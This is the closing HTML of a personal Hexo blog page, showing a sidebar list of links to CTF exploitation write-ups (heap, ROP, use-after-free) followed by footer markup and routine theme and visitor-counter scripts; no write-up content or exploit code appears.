class="post-list-item"><a class="post-list-link" href="/2022/01/19/hitcontraining_unlink/">hitcontraining_unlink</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/14/0ctf_2017_babyheap/">0ctf2017-babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/13/jarvisoj_level6_x64/">jarvisoj_level6_x64</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/02/To%20kk/">To kk</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/12/26/diary/">Diaries</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/11/25/unlink/">unlink</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/11/17/pwnable.tw_orw/">pwnable.tw orw</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/11/17/hitcontraining_uaf/">堆漏洞uaf</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/11/16/%E6%A0%88%E6%BA%A2%E5%87%BA/">栈溢出</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/11/15/%E5%A0%86%E6%BA%A2%E5%87%BA/">babyheap_0ctf_2017</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/11/11/ROP/">CTF-WIKI-pwn-基本ROP 漏洞复现</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2016-2022 y1seco
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="A fast, simple &amp; powerful blog framework">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="Another simple and elegant theme for Hexo  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="Site Visitors"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="Page Hits"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 5;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="Back to Top"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="Comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="Go to Bottom"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>